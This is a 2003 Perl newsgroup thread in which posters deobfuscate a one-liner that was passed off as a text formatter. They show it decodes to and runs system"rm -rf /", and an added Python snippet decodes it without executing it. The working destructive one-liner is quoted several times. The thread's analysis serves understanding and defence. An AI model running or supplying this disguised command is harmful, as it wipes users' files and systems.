Perl tricks

Discussion in 'Perl Misc' started by Andrei Koulik, Sep 25, 2003.

  1. Can anybody explain to me how this command deletes files:
    perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/"
    -;;s;;$_;see'
    Andrei Koulik, Sep 25, 2003
    #1

  2. In article <bku8sv$63cvq$-berlin.de>,
    Andrei Koulik <> wrote:
    >Can anybody explain to me how this command deletes files:
    >perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/"
    >-;;s;;$_;see'



    You can use Deparse to get a clearer view:

    perl -MO=Deparse
    $??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/"-;;s;;$_;see
    ^D

    $?->perl ? s/;s/s;;$?/ : s//=]=>%-{<-|}<&|`{/;
    tr( -/:-@[-`{-})[`-{/"\-];
    s//$_;/see;

    The evil is lurking in the final double eval. Comment that
    line and throw in a 'print' after preceding statements,

    ....
    tr( -/:-@[-`{-})[`-{/"\-]; print;
    #s//$_;/see;

    Ah, the $_ that the double eval loads up with is:

    system"rm--rf-/"

    HTH,
    --
    Charles DeRykus
    Charles DeRykus, Sep 25, 2003
    #2

  3. Andrei Koulik wrote:
    >
    > Can anybody explain to me how this command deletes files:
    > perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'


    Just change the "s;;$_;see" at the end to "print":

    $ perl -le '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;print'
    system"rm -rf /"


    John
    --
    use Perl;
    program
    fulfillment
    John W. Krahn, Sep 25, 2003
    #3
  4. David

    Andrei Koulik <> wrote in message news:<bku8sv$63cvq$-berlin.de>...
    > Can anybody explain to me how this command deletes files:
    > perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/"
    > -;;s;;$_;see'


    translation:

    $? ?
    s/;s/s;;$?/
    :
    s//=]=>%-{<-|}<&|`{/;

    tr( -/:-@[-`{-})[`-{/"\-];

    s//do{
    $_;
    };/see;

    more translation:

    1. this:

    $? ?
    s/;s/s;;$?/
    :
    s//=]=>%-{<-|}<&|`{/;

    essentially translates to:

    $_ = '=]=>%-{<-|}<&|`{';

    look up perldoc perlvar to see what $? holds and you will know why.

    2. this:

    tr( -/:-@[-`{-})[`-{/"\-];

    has a few components. those between '(' and ')' are characters to be translated:

    ' -/' means: all characters between the space and '/'
    ':-@' means: all characters between ':' and '@'
    '[-`' means: all characters between '[' and '`'
    '{-}' means: all characters between '{' and '}'

    those between '[' and ']' are characters translated to:

    '`-{' means: all characters between '`' and '{'
    '/" \-' means just the literal characters.

    so you are translating:

    !"#$%&'()*+,-./:;<=>?@[\]^_`{|}
    `abcdefghijklmnopqrstuvwxyz{/" -

    characters from upper string to the lower string.

    now notice what $_ is; plugging in the translation gives $_ to be:

    system"rm -rf /"

    3. isn't it clear from now on?

    s//do{
    $_;
    };/see;

    'ee' basically runs the system call via do{}.

    4. question: are you going to run that to confirm what i said?

    david
    David, Sep 25, 2003
    #4
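
The transliteration step David walks through can be reproduced without letting perl evaluate anything. This is an added example, not code from any poster in the thread: the function names and the `RISKY` watch list are assumptions, and the three strings are copied from the one-liner as quoted above. It also shows why post #2 prints dashes: with the space missing from the replacement list, Perl repeats the last replacement character.

```python
# Added example: static decoding of the tr/// step. Nothing is run as Perl.
import re

def expand_tr(spec):
    """Expand a Perl tr/// list: 'a-z' ranges, backslash escapes, literals."""
    out, i = [], 0
    while i < len(spec):
        ch = spec[i]
        if ch == "\\" and i + 1 < len(spec):       # "\-" is a literal '-'
            out.append(spec[i + 1])
            i += 2
        elif i + 2 < len(spec) and spec[i + 1] == "-":   # inclusive range
            out.extend(chr(c) for c in range(ord(ch), ord(spec[i + 2]) + 1))
            i += 3
        else:                                      # literal, incl. trailing '-'
            out.append(ch)
            i += 1
    return out

def apply_tr(text, search, repl):
    """Transliterate text the way Perl's tr/search/repl/ does."""
    s, r = expand_tr(search), expand_tr(repl)
    if not r:                                      # empty list: map to itself
        r = s
    elif len(r) < len(s):                          # short list: repeat last char
        r = r + [r[-1]] * (len(s) - len(r))
    table = {}
    for a, b in zip(s, r):
        table.setdefault(a, b)                     # first mapping wins
    return "".join(table.get(c, c) for c in text)

# Builtins that hand a string to the shell or touch files (assumed watch list).
RISKY = re.compile(r"\b(?:system|exec|qx|unlink|open)\b|`")

def triage(decoded):
    """Return the risky tokens found in a decoded string, sorted, no duplicates."""
    return sorted(set(RISKY.findall(decoded)))

# Strings copied from the one-liner quoted in the thread.
ENCODED = "=]=>%-{<-|}<&|`{"
SEARCH = " -/:-@[-`{-}"
REPL = '`-{/" -'            # as typed in post #3
REPL_NO_SPACE = '`-{/"\\-'  # as Deparse printed it in post #2

if __name__ == "__main__":
    for repl in (REPL, REPL_NO_SPACE):
        decoded = apply_tr(ENCODED, SEARCH, repl)
        print(repr(decoded), "->", triage(decoded))
```
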
  5. Jay Tilton

    Andrei Koulik <> wrote:

    : Can anybody explain to me how this command deletes files:
    : perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/"
    : -;;s;;$_;see'

    Start by running it through the Deparse backend to get rid of some
    obfuscating elements, then add some whitespace for readability.

    $? ? s/;s/s;;$?/
    : s//=]=>%-{<-|}<&|`{/ ;

    That puts the string "=]=>%-{<-|}<&|`{" into $_ .

    Beyond extra obfuscation, I don't know what "s/;s/s;;$?/" could have to
    do with anything--I don't know of a circumstance where $? would hold a
    true value when the program starts execution.

    tr ( -/:-@[-`{-})
    [`-{/" \-] ;

    That alters the characters in $_.
    If you print it now, it will read 'system"rm -rf /"' .

    s//do { $_ };/see ;

    That's just a hairy way of saying "eval $_" .

    So were you aware of the code's malicious nature before running it, or
    did something terrible happen?
    Jay Tilton, Sep 25, 2003
    #5
  6. Thanks to all very much.
    Yesterday I parsed it manually the way John W. Krahn does, but from
    your replies I have learnt some useful things.

    Andrei Koulik wrote:

    > Can anybody explain to me how this command deletes files:
    > perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/"
    > -;;s;;$_;see'
    >
    Andrei Koulik, Sep 26, 2003
    #6
  7. Jay Tilton wrote:
    ......
    >
    > So were you aware of the code's malicious nature before running it, or
    > did something terrible happen?
    >

    I was asked to debug a script for text formation:

    cat "test... test... test..." | perl -e
    '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

    but I noted that neither the -n nor the -p option is used, so I started to
    debug it on behalf of the news user (it doesn't own any files).
    But after some steps, lines:
    ....
    rm: /usr/bin/objcopy: Permission denied
    rm: /usr/bin/objdump: Permission denied
    rm: /usr/bin/ranlib: Permission denied
    ....
    were printed. When I pressed ctrl-c the output froze, but beeping
    started and the terminal didn't respond to any keys.
    I didn't know what had happened, so I had to understand what this program
    actually does to detect possible injuries.
    Andrei Koulik, Sep 26, 2003
    #7
  8. Jay Tilton

    Andrei Koulik <> wrote:

    : Jay Tilton wrote:
    : .....
    : >
    : > So were you aware of the code's malicious nature before running it, or
    : > did something terrible happen?
    : >
    : I was asked to debug a script for text formation:
    :
    : cat "test... test... test..." | perl -e
    : '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
    :
    : but I noted that neither the -n nor the -p option is used, so I started to
    : debug it on behalf of the news user (it doesn't own any files).
    :
    : But after some steps, lines:
    : ...
    : rm: /usr/bin/objcopy: Permission denied
    : rm: /usr/bin/objdump: Permission denied
    : rm: /usr/bin/ranlib: Permission denied
    : ...
    : were printed. When I pressed ctrl-c the output froze, but beeping
    : started and the terminal didn't respond to any keys.
    : I didn't know what had happened, so I had to understand what this program
    : actually does to detect possible injuries.

    Next time you feel compelled to run a mysterious script like that, you
    might want to use perl's -T switch, at the least. In this case, it
    would have halted the program with an "Insecure $ENV{PATH}" error before
    any mischief could begin.
    Jay Tilton, Sep 27, 2003
    #8
